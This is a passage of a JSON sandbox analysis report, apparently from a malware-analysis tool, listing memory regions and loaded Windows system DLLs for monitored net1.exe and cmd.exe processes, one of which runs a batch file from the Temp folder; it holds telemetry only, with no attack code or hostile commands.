"ref_parent_process": { "ref_id": "proc_19", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000020-region_00001345-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1346", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:48.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1347", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:48.797", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000020-region_00001348-addr_0x0000000000130000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:48.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4431871, "entry_point": 4268424, "filename": "\\Windows\\System32\\net1.exe", "id": "region_1349", "name": "net1.exe", "norm_filename": "c:\\windows\\system32\\net1.exe", "region_type": "memory_mapped_file", "start_va": 4259840, "timestamp": "00:00:48.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1350", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1351", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1352", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.802", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000020-region_00001353-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1353", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:48.803", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000020-region_00001354-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1354", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1355", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1356", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1357", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:48.819", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000020-region_00001358-addr_0x00000000001d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_1358", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:48.819", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000020-region_00001359-addr_0x0000000000370000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_1359", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:48.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1829634048, "type": "region", "version": 1 }, "end_va": 1829687295, "entry_point": 1829638864, "filename": "\\Windows\\System32\\browcli.dll", "id": "region_1360", "name": "browcli.dll", "norm_filename": "c:\\windows\\system32\\browcli.dll", "region_type": "memory_mapped_file", "start_va": 1829634048, "timestamp": "00:00:48.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1875771392, "type": "region", "version": 1 }, "end_va": 1875869695, "entry_point": 1875776309, "filename": "\\Windows\\System32\\ntdsapi.dll", "id": "region_1361", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\system32\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1875771392, "timestamp": "00:00:48.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934553087, "entry_point": 1934496350, "filename": "\\Windows\\System32\\samcli.dll", "id": "region_1362", "name": "samcli.dll", "norm_filename": "c:\\windows\\system32\\samcli.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:48.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1939931136, "type": "region", "version": 1 }, "end_va": 1940004863, "entry_point": 1939949461, "filename": "\\Windows\\System32\\samlib.dll", "id": "region_1363", "name": "samlib.dll", "norm_filename": "c:\\windows\\system32\\samlib.dll", "region_type": "memory_mapped_file", "start_va": 1939931136, "timestamp": "00:00:48.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1944518656, "type": "region", "version": 1 }, "end_va": 1944580095, "entry_point": 1944523425, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_1364", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1944518656, "timestamp": "00:00:48.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944584192, "type": "region", "version": 1 }, "end_va": 1944621055, "entry_point": 1944589734, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_1365", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944584192, "timestamp": "00:00:48.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1944649728, "type": "region", "version": 1 }, "end_va": 1944719359, "entry_point": 1944654592, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_1366", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944649728, "timestamp": "00:00:48.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1947860992, "type": "region", "version": 1 }, "end_va": 1947897855, "entry_point": 1947865641, "filename": "\\Windows\\System32\\dsrole.dll", "id": "region_1367", "name": "dsrole.dll", "norm_filename": "c:\\windows\\system32\\dsrole.dll", "region_type": "memory_mapped_file", "start_va": 1947860992, "timestamp": "00:00:48.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1959591936, "type": "region", "version": 1 }, "end_va": 1959731199, "entry_point": 1959613417, "filename": "\\Windows\\System32\\logoncli.dll", "id": "region_1368", "name": "logoncli.dll", "norm_filename": "c:\\windows\\system32\\logoncli.dll", "region_type": "memory_mapped_file", "start_va": 1959591936, "timestamp": "00:00:48.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1369", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:48.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1370", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1371", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:48.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1372", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:48.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1373", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:48.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1374", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1375", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1376", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:00:48.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1377", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:48.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1378", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8192, "start_va": 1828716544, "type": "region", "version": 1 }, "end_va": 1828724735, "entry_point": 1828716544, "filename": "\\Windows\\System32\\netmsg.dll", "id": "region_1379", "name": "netmsg.dll", "norm_filename": "c:\\windows\\system32\\netmsg.dll", "region_type": "memory_mapped_file", "start_va": 1828716544, "timestamp": "00:00:48.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1380", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:48.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1381", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:48.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 8597503, "entry_point": 0, "filename": null, "id": "region_1382", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:48.844", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd /c \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\" \"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_23", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 23, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000023-region_00001401-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1401", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:51.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1402", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:51.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1403", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:51.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001404-addr_0x0000000000150000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1404", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:51.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1405", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:51.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1406", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:51.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1407", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:51.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1408", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:51.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001409-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1409", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:51.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001410-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1410", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:51.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1411", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:51.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1412", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:51.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1413", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:51.054", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001414-addr_0x00000000000e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_1414", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:51.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001415-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:51.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1416", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:51.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1417", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:51.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1418", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:51.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 